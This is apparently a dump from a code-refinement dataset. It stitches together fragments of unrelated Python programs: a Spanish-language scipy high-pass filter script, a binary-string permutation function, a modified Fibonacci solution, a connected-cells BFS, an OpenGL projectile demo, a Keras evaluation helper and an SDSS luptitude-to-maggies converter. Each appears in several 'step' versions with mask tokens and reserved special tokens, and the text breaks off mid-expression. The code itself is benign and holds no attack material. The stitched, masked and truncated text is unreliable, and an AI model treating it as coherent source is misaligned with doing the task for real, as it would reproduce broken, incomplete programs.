my_p_hp, my_k_hp = sig.tf2zpk 
(NUM_hp, DEN_hp )\r\n\r\n# ---------------------------------------------------------------------------\r\n# ---------------------------------------------------------------------------\r\n\r\n# Filtrado de la Señal:\r\n \r\nt, s_filtrada, x = sig.lsim2 ((my_tf_hp), sgnal, t )\r\n\r\n# ---------------------------------------------------------------------------\r\n# ---------------------------------------------------------------------------\r\n\r\n# Ploteo de las Señales, Respuesta en Frecuencia, etc.\r\n\r\nfig1, axs = plt.subplots(4,1)\r\n\r\naxs[0].plot ( t, s_t )\r\naxs[0].grid ('True')\r\naxs[0].set_title ('Señal Original')\r\naxs[0].set_ylim(-0.2,0.2)\r\naxs[0].set_ylabel('[V]')\r\n\r\naxs[1].plot ( t, r_t )\r\naxs[1].grid ('True')\r\naxs[1].set_title ('Ruido Interferente')\r\naxs[1].set_ylabel('[V]')\r\naxs[1].set_xlim(0)\r\n\r\naxs[2].plot (t, s_t + r_t )\r\naxs[2].grid ('True')\r\naxs[2].set_title ('Señal a Filtrar')\r\naxs[2].set_ylabel('[V]')\r\naxs[2].set_xlim(0)\r\n\r\naxs[3].plot (t, s_filtrada )\r\naxs[3].grid ('True')\r\naxs[3].set_title ( 'Señal Filtrada' )\r\naxs[3].set_xlabel ('t[seg]')\r\naxs[3].set_ylabel('[V]')\r\naxs[3].set_ylim(-0.2,0.2)\r\naxs[3].set_xlim(0)\r\n\r\n# Respuesta en Frecuencia:\r\nbodePlot (my_tf_lp, 'Filtro Prototipo - Low Pass')\r\npzmap (my_tf_lp)\r\n\r\nbodePlot (my_tf_hp, 'Filtro Destino - High Pass')\r\npzmap (my_tf_hp)\r\n\r\n\r\n\r\n\r\n\r\n \r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def zbits(n, k):
zeros = '0' * k
ones = '1' * (n - k)
binary = ones + zeros
string = {''.join(i) for i in itertools.permutations(binary, n)}
return string
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def zbits(n, k):
zeros = '0' * k
ones = '1' * (n - k)
binary = ones + zeros
string = {''.join(i) for i in itertools.permutations(binary, n)}
return string
assert zbits(4, 3) == {'0100', '0001', '0010', '1000'}
assert zbits(4, 1) == {'0111', '1011', '1101', '1110'}
assert zbits(5, 4) == {'00001', '00100', '01000', '10000', '00010'}
<|reserved_special_token_1|>
import itertools
def zbits(n, k):
zeros = '0' * k
ones = '1' * (n - k)
binary = ones + zeros
string = {''.join(i) for i in itertools.permutations(binary, n)}
return string
assert zbits(4, 3) == {'0100', '0001', '0010', '1000'}
assert zbits(4, 1) == {'0111', '1011', '1101', '1110'}
assert zbits(5, 4) == {'00001', '00100', '01000', '10000', '00010'}
<|reserved_special_token_1|>
import itertools
def zbits(n,k):
zeros = "0" * k
ones = "1" * (n-k)
binary = ones+zeros
string = {''.join(i) for i in itertools.permutations(binary, n)}
return(string)
assert zbits(4, 3) == {'0100', '0001', '0010', '1000'}
assert zbits(4, 1) == {'0111', '1011', '1101', '1110'}
assert zbits(5, 4) == {'00001', '00100', '01000', '10000', '00010'}
|
flexible
|
{
"blob_id": "a8d13c3fbf6051eba392bcdd6dcb3e946696585f",
"index": 9065,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef zbits(n, k):\n zeros = '0' * k\n ones = '1' * (n - k)\n binary = ones + zeros\n string = {''.join(i) for i in itertools.permutations(binary, n)}\n return string\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef zbits(n, k):\n zeros = '0' * k\n ones = '1' * (n - k)\n binary = ones + zeros\n string = {''.join(i) for i in itertools.permutations(binary, n)}\n return string\n\n\nassert zbits(4, 3) == {'0100', '0001', '0010', '1000'}\nassert zbits(4, 1) == {'0111', '1011', '1101', '1110'}\nassert zbits(5, 4) == {'00001', '00100', '01000', '10000', '00010'}\n",
"step-4": "import itertools\n\n\ndef zbits(n, k):\n zeros = '0' * k\n ones = '1' * (n - k)\n binary = ones + zeros\n string = {''.join(i) for i in itertools.permutations(binary, n)}\n return string\n\n\nassert zbits(4, 3) == {'0100', '0001', '0010', '1000'}\nassert zbits(4, 1) == {'0111', '1011', '1101', '1110'}\nassert zbits(5, 4) == {'00001', '00100', '01000', '10000', '00010'}\n",
"step-5": "import itertools \n\ndef zbits(n,k):\n zeros = \"0\" * k\n ones = \"1\" * (n-k)\n binary = ones+zeros\n string = {''.join(i) for i in itertools.permutations(binary, n)}\n return(string)\n\n\nassert zbits(4, 3) == {'0100', '0001', '0010', '1000'}\nassert zbits(4, 1) == {'0111', '1011', '1101', '1110'}\nassert zbits(5, 4) == {'00001', '00100', '01000', '10000', '00010'}",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/bin/python3
import sys
def fibonacciModified(t1, t2, n):
ti = t1
ti_1 = t2
for i in range (2, n):
ti_2 = ti + ti_1**2
ti = ti_1
ti_1 = ti_2
return ti_2
if __name__ == "__main__":
t1, t2, n = input().strip().split(' ')
t1, t2, n = [int(t1), int(t2), int(n)]
result = fibonacciModified(t1, t2, n)
print(result)
|
normal
|
{
"blob_id": "3838df627318b25767738da912f44e494cef40f3",
"index": 6833,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range(2, n):\n ti_2 = ti + ti_1 ** 2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range(2, n):\n ti_2 = ti + ti_1 ** 2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\n\nif __name__ == '__main__':\n t1, t2, n = input().strip().split(' ')\n t1, t2, n = [int(t1), int(t2), int(n)]\n result = fibonacciModified(t1, t2, n)\n print(result)\n",
"step-4": "import sys\n\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range(2, n):\n ti_2 = ti + ti_1 ** 2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\n\nif __name__ == '__main__':\n t1, t2, n = input().strip().split(' ')\n t1, t2, n = [int(t1), int(t2), int(n)]\n result = fibonacciModified(t1, t2, n)\n print(result)\n",
"step-5": "#!/bin/python3\n\nimport sys\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range (2, n):\n ti_2 = ti + ti_1**2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\nif __name__ == \"__main__\":\n t1, t2, n = input().strip().split(' ')\n t1, t2, n = [int(t1), int(t2), int(n)]\n result = fibonacciModified(t1, t2, n)\n print(result)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def connectedCell(matrix, n, m):
visit = []
for j in range(n):
a = []
for i in range(m):
a.append(True)
visit.append(a)
path = 0
for i in range(n):
for j in range(m):
if visit[i][j]:
count = 0
nodes = deque([(i, j)])
while nodes:
i_ind, j_ind = nodes.pop()
if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind
]:
visit[i_ind][j_ind] = False
if matrix[i_ind][j_ind] == 1:
count += 1
nodes_list = [(i_ind - 1, j_ind - 1), (i_ind -
1, j_ind), (i_ind - 1, j_ind + 1), (i_ind,
j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,
j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,
j_ind + 1)]
nodes.extend(nodes_list)
if count > path:
path = count
return path
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connectedCell(matrix, n, m):
visit = []
for j in range(n):
a = []
for i in range(m):
a.append(True)
visit.append(a)
path = 0
for i in range(n):
for j in range(m):
if visit[i][j]:
count = 0
nodes = deque([(i, j)])
while nodes:
i_ind, j_ind = nodes.pop()
if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind
]:
visit[i_ind][j_ind] = False
if matrix[i_ind][j_ind] == 1:
count += 1
nodes_list = [(i_ind - 1, j_ind - 1), (i_ind -
1, j_ind), (i_ind - 1, j_ind + 1), (i_ind,
j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,
j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,
j_ind + 1)]
nodes.extend(nodes_list)
if count > path:
path = count
return path
<|reserved_special_token_0|>
print('result = ', result)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connectedCell(matrix, n, m):
visit = []
for j in range(n):
a = []
for i in range(m):
a.append(True)
visit.append(a)
path = 0
for i in range(n):
for j in range(m):
if visit[i][j]:
count = 0
nodes = deque([(i, j)])
while nodes:
i_ind, j_ind = nodes.pop()
if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind
]:
visit[i_ind][j_ind] = False
if matrix[i_ind][j_ind] == 1:
count += 1
nodes_list = [(i_ind - 1, j_ind - 1), (i_ind -
1, j_ind), (i_ind - 1, j_ind + 1), (i_ind,
j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,
j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,
j_ind + 1)]
nodes.extend(nodes_list)
if count > path:
path = count
return path
n = 2
m = 2
matrix = [[1] * n] * m
result = connectedCell(matrix, n, m)
print('result = ', result)
<|reserved_special_token_1|>
import sys
from collections import deque
def connectedCell(matrix, n, m):
visit = []
for j in range(n):
a = []
for i in range(m):
a.append(True)
visit.append(a)
path = 0
for i in range(n):
for j in range(m):
if visit[i][j]:
count = 0
nodes = deque([(i, j)])
while nodes:
i_ind, j_ind = nodes.pop()
if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind
]:
visit[i_ind][j_ind] = False
if matrix[i_ind][j_ind] == 1:
count += 1
nodes_list = [(i_ind - 1, j_ind - 1), (i_ind -
1, j_ind), (i_ind - 1, j_ind + 1), (i_ind,
j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,
j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,
j_ind + 1)]
nodes.extend(nodes_list)
if count > path:
path = count
return path
n = 2
m = 2
matrix = [[1] * n] * m
result = connectedCell(matrix, n, m)
print('result = ', result)
<|reserved_special_token_1|>
#!/bin/python3
import sys
from collections import deque
def connectedCell(matrix,n,m):
# Complete this function
visit = []
for j in range(n):
a = []
for i in range(m):
a.append(True)
visit.append(a)
#print(visit)
path = 0
for i in range(n):
for j in range(m):
if visit[i][j]:
count = 0
#visit[i_ind][j_ind] =
nodes = deque([(i,j)])
while nodes:
i_ind, j_ind = nodes.pop()
#visit[i_ind][j_ind] = False
#print(i_ind,j_ind )
if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind]:
#print(i_ind, j_ind)
visit[i_ind][j_ind] = False
if matrix[i_ind][j_ind] == 1:
count += 1
nodes_list = [(i_ind -1, j_ind-1),
(i_ind -1, j_ind),
(i_ind -1, j_ind+1),
(i_ind, j_ind-1),
(i_ind, j_ind+1),
(i_ind +1, j_ind-1),
(i_ind +1, j_ind),
(i_ind +1, j_ind+1)]
#print(*nodes_list)
nodes.extend(nodes_list)
if count > path:
path = count
return path
# if __name__ == "__main__":
# n = int(input().strip())
# m = int(input().strip())
# matrix = []
# for matrix_i in range(n):
# matrix_t = [int(matrix_temp) for matrix_temp in input().strip().split(' ')]
# matrix.append(matrix_t)
# result = connectedCell(matrix,n,m)
# print(result)
n = 2
m = 2
matrix = [[1]*n]*m
result = connectedCell(matrix,n,m)
print('result = ',result)
|
flexible
|
{
"blob_id": "25a159ca2abf0176135086324ab355d6f5d9fe9e",
"index": 5054,
"step-1": "<mask token>\n\n\ndef connectedCell(matrix, n, m):\n visit = []\n for j in range(n):\n a = []\n for i in range(m):\n a.append(True)\n visit.append(a)\n path = 0\n for i in range(n):\n for j in range(m):\n if visit[i][j]:\n count = 0\n nodes = deque([(i, j)])\n while nodes:\n i_ind, j_ind = nodes.pop()\n if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind\n ]:\n visit[i_ind][j_ind] = False\n if matrix[i_ind][j_ind] == 1:\n count += 1\n nodes_list = [(i_ind - 1, j_ind - 1), (i_ind - \n 1, j_ind), (i_ind - 1, j_ind + 1), (i_ind, \n j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,\n j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,\n j_ind + 1)]\n nodes.extend(nodes_list)\n if count > path:\n path = count\n return path\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef connectedCell(matrix, n, m):\n visit = []\n for j in range(n):\n a = []\n for i in range(m):\n a.append(True)\n visit.append(a)\n path = 0\n for i in range(n):\n for j in range(m):\n if visit[i][j]:\n count = 0\n nodes = deque([(i, j)])\n while nodes:\n i_ind, j_ind = nodes.pop()\n if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind\n ]:\n visit[i_ind][j_ind] = False\n if matrix[i_ind][j_ind] == 1:\n count += 1\n nodes_list = [(i_ind - 1, j_ind - 1), (i_ind - \n 1, j_ind), (i_ind - 1, j_ind + 1), (i_ind, \n j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,\n j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,\n j_ind + 1)]\n nodes.extend(nodes_list)\n if count > path:\n path = count\n return path\n\n\n<mask token>\nprint('result = ', result)\n",
"step-3": "<mask token>\n\n\ndef connectedCell(matrix, n, m):\n visit = []\n for j in range(n):\n a = []\n for i in range(m):\n a.append(True)\n visit.append(a)\n path = 0\n for i in range(n):\n for j in range(m):\n if visit[i][j]:\n count = 0\n nodes = deque([(i, j)])\n while nodes:\n i_ind, j_ind = nodes.pop()\n if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind\n ]:\n visit[i_ind][j_ind] = False\n if matrix[i_ind][j_ind] == 1:\n count += 1\n nodes_list = [(i_ind - 1, j_ind - 1), (i_ind - \n 1, j_ind), (i_ind - 1, j_ind + 1), (i_ind, \n j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,\n j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,\n j_ind + 1)]\n nodes.extend(nodes_list)\n if count > path:\n path = count\n return path\n\n\nn = 2\nm = 2\nmatrix = [[1] * n] * m\nresult = connectedCell(matrix, n, m)\nprint('result = ', result)\n",
"step-4": "import sys\nfrom collections import deque\n\n\ndef connectedCell(matrix, n, m):\n visit = []\n for j in range(n):\n a = []\n for i in range(m):\n a.append(True)\n visit.append(a)\n path = 0\n for i in range(n):\n for j in range(m):\n if visit[i][j]:\n count = 0\n nodes = deque([(i, j)])\n while nodes:\n i_ind, j_ind = nodes.pop()\n if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind\n ]:\n visit[i_ind][j_ind] = False\n if matrix[i_ind][j_ind] == 1:\n count += 1\n nodes_list = [(i_ind - 1, j_ind - 1), (i_ind - \n 1, j_ind), (i_ind - 1, j_ind + 1), (i_ind, \n j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,\n j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,\n j_ind + 1)]\n nodes.extend(nodes_list)\n if count > path:\n path = count\n return path\n\n\nn = 2\nm = 2\nmatrix = [[1] * n] * m\nresult = connectedCell(matrix, n, m)\nprint('result = ', result)\n",
"step-5": "#!/bin/python3\n\nimport sys\nfrom collections import deque\n\ndef connectedCell(matrix,n,m):\n # Complete this function\n visit = []\n for j in range(n):\n a = []\n for i in range(m):\n a.append(True)\n visit.append(a)\n #print(visit)\n path = 0\n for i in range(n):\n for j in range(m):\n if visit[i][j]:\n count = 0\n #visit[i_ind][j_ind] = \n nodes = deque([(i,j)])\n while nodes:\n i_ind, j_ind = nodes.pop()\n #visit[i_ind][j_ind] = False\n #print(i_ind,j_ind )\n if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind]:\n #print(i_ind, j_ind)\n visit[i_ind][j_ind] = False\n if matrix[i_ind][j_ind] == 1:\n count += 1\n nodes_list = [(i_ind -1, j_ind-1),\n (i_ind -1, j_ind),\n (i_ind -1, j_ind+1), \n (i_ind, j_ind-1),\n (i_ind, j_ind+1),\n (i_ind +1, j_ind-1),\n (i_ind +1, j_ind),\n (i_ind +1, j_ind+1)]\n #print(*nodes_list)\n nodes.extend(nodes_list)\n if count > path:\n path = count\n return path\n \n \n \n \n\n# if __name__ == \"__main__\":\n# n = int(input().strip())\n# m = int(input().strip())\n# matrix = []\n# for matrix_i in range(n):\n# matrix_t = [int(matrix_temp) for matrix_temp in input().strip().split(' ')]\n# matrix.append(matrix_t)\n# result = connectedCell(matrix,n,m)\n# print(result)\nn = 2\nm = 2\nmatrix = [[1]*n]*m\nresult = connectedCell(matrix,n,m)\nprint('result = ',result)",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import time
import numpy as np
from OpenGL.GLUT import *
from OpenGL.GLU import *
from OpenGL.GL import *
from utils import *
g = 9.8
t_start = 0
def init():
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0, 0.0, 0.0)
glPointSize(2)
gluOrtho2D(0.0, 500.0, 0.0, 500.0)
def disp():
draw_circle(50, 50, 10)
def mouse(btn, state, x, y):
global t_start
if btn == 0 and state == 1:
t_start = time.time()
kick(50, 50, 45, 20)
def kick(x, y, theta, u):
theta *= np.pi/180
tot_time = 2 * u * np.sin(theta) / g
print(tot_time)
t0 = time.time()
t = 0
while t < tot_time:
t = time.time() - t0
x_inc = u * np.cos(theta) + t + x
y_inc = u * np.sin((theta)) - g * t ** 2 + y
print(x_inc, y_inc)
poly(get_square_vertices(x_inc, y_inc))
time.sleep(0.1)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(500, 500)
glutInitWindowPosition(0, 0)
glutCreateWindow(b'Projectile Motion')
init()
glutDisplayFunc(disp)
glutMouseFunc(mouse)
glutMainLoop()
main()
|
normal
|
{
"blob_id": "d85c0929b22f57367c0e707bac78e56027113417",
"index": 4539,
"step-1": "<mask token>\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\n<mask token>\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-3": "<mask token>\ng = 9.8\nt_start = 0\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-4": "import time\nimport numpy as np\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\nfrom utils import *\ng = 9.8\nt_start = 0\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-5": "import time\n\nimport numpy as np\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\nfrom utils import *\n\ng = 9.8\nt_start = 0\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi/180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin((theta)) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
#!/usr/bin/env python3
'''Testing File'''
import tensorflow.keras as K
def test_model(
network, data, labels, verbose=True
):
'''A Function that tests
a neural network'''
return network.evaluate(
x=data,
y=labels,
verbose=verbose
)
|
normal
|
{
"blob_id": "39643454cbef9e6fa7979d0f660f54e07d155bc7",
"index": 7690,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_model(network, data, labels, verbose=True):\n \"\"\"A Function that tests\n a neural network\"\"\"\n return network.evaluate(x=data, y=labels, verbose=verbose)\n",
"step-3": "<mask token>\nimport tensorflow.keras as K\n\n\ndef test_model(network, data, labels, verbose=True):\n \"\"\"A Function that tests\n a neural network\"\"\"\n return network.evaluate(x=data, y=labels, verbose=verbose)\n",
"step-4": "#!/usr/bin/env python3\n'''Testing File'''\nimport tensorflow.keras as K\n\n\ndef test_model(\n network, data, labels, verbose=True\n):\n '''A Function that tests\n a neural network'''\n return network.evaluate(\n x=data,\n y=labels,\n verbose=verbose\n )\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
''' Converts luptitudes to maggies and stores in folder output
Written by P. Gallardo
'''
import numpy as np
import pandas as pd
import sys
assert len(sys.argv) == 2 # usage: lups2maggies.py /path/to/cat.csv
fname = sys.argv[1]
print("Converting maggies from catalog \n%s" % fname)
df = pd.read_csv(fname)
z = df['z'].values
mod_u = df['cModelMag_u'].values
mod_g = df['cModelMag_g'].values
mod_r = df['cModelMag_r'].values
mod_i = df['cModelMag_i'].values
mod_z = df['cModelMag_z'].values
ext_u = df['extinction_u'].values
ext_g = df['extinction_g'].values
ext_r = df['extinction_r'].values
ext_i = df['extinction_i'].values
ext_z = df['extinction_z'].values
err_u = df['cModelMagErr_u'].values
err_g = df['cModelMagErr_g'].values
err_r = df['cModelMagErr_r'].values
err_i = df['cModelMagErr_i'].values
err_z = df['cModelMagErr_z'].values
dered_u = mod_u - ext_u
dered_g = mod_g - ext_g
dered_r = mod_r - ext_r
dered_i = mod_i - ext_i
dered_z = mod_z - ext_z
b = np.array([1.4, 0.9, 1.2, 1.8, 7.4]) * 1e-10
flux_u = 2.*b[0] * np.sinh(-np.log(10.)/2.5*dered_u-np.log(b[0]))
flux_g = 2.*b[1] * np.sinh(-np.log(10.)/2.5*dered_g-np.log(b[1]))
flux_r = 2.*b[2] * np.sinh(-np.log(10.)/2.5*dered_r-np.log(b[2]))
flux_i = 2.*b[3] * np.sinh(-np.log(10.)/2.5*dered_i-np.log(b[3]))
flux_z = 2.*b[4] * np.sinh(-np.log(10.)/2.5*dered_z-np.log(b[4]))
ivar_u = 2.*b[0]*np.cosh(-np.log(10.)/2.5*dered_u-np.log(b[0]))*(-np.log(10)/2.5)*err_u # noqa
ivar_g = 2.*b[1]*np.cosh(-np.log(10.)/2.5*dered_g-np.log(b[1]))*(-np.log(10)/2.5)*err_g # noqa
ivar_r = 2.*b[2]*np.cosh(-np.log(10.)/2.5*dered_r-np.log(b[2]))*(-np.log(10)/2.5)*err_r # noqa
ivar_i = 2.*b[3]*np.cosh(-np.log(10.)/2.5*dered_i-np.log(b[3]))*(-np.log(10)/2.5)*err_i # noqa
ivar_z = 2.*b[4]*np.cosh(-np.log(10.)/2.5*dered_z-np.log(b[4]))*(-np.log(10)/2.5)*err_z # noqa
ivar_u = 1./ivar_u**2.
ivar_g = 1./ivar_g**2.
ivar_r = 1./ivar_r**2.
ivar_i = 1./ivar_i**2.
ivar_z = 1./ivar_z**2.
to_exp = np.transpose([z, flux_u, flux_g, flux_r, flux_i, flux_z,
ivar_u, ivar_g, ivar_r, ivar_i, ivar_z])
np.savetxt('./output/maggies.txt',
to_exp)
|
normal
|
{
"blob_id": "e8971b3d183ded99a5fc03f031ef807280b8cc7f",
"index": 1744,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nassert len(sys.argv) == 2\n<mask token>\nprint(\"\"\"Converting maggies from catalog \n%s\"\"\" % fname)\n<mask token>\nnp.savetxt('./output/maggies.txt', to_exp)\n",
"step-3": "<mask token>\nassert len(sys.argv) == 2\nfname = sys.argv[1]\nprint(\"\"\"Converting maggies from catalog \n%s\"\"\" % fname)\ndf = pd.read_csv(fname)\nz = df['z'].values\nmod_u = df['cModelMag_u'].values\nmod_g = df['cModelMag_g'].values\nmod_r = df['cModelMag_r'].values\nmod_i = df['cModelMag_i'].values\nmod_z = df['cModelMag_z'].values\next_u = df['extinction_u'].values\next_g = df['extinction_g'].values\next_r = df['extinction_r'].values\next_i = df['extinction_i'].values\next_z = df['extinction_z'].values\nerr_u = df['cModelMagErr_u'].values\nerr_g = df['cModelMagErr_g'].values\nerr_r = df['cModelMagErr_r'].values\nerr_i = df['cModelMagErr_i'].values\nerr_z = df['cModelMagErr_z'].values\ndered_u = mod_u - ext_u\ndered_g = mod_g - ext_g\ndered_r = mod_r - ext_r\ndered_i = mod_i - ext_i\ndered_z = mod_z - ext_z\nb = np.array([1.4, 0.9, 1.2, 1.8, 7.4]) * 1e-10\nflux_u = 2.0 * b[0] * np.sinh(-np.log(10.0) / 2.5 * dered_u - np.log(b[0]))\nflux_g = 2.0 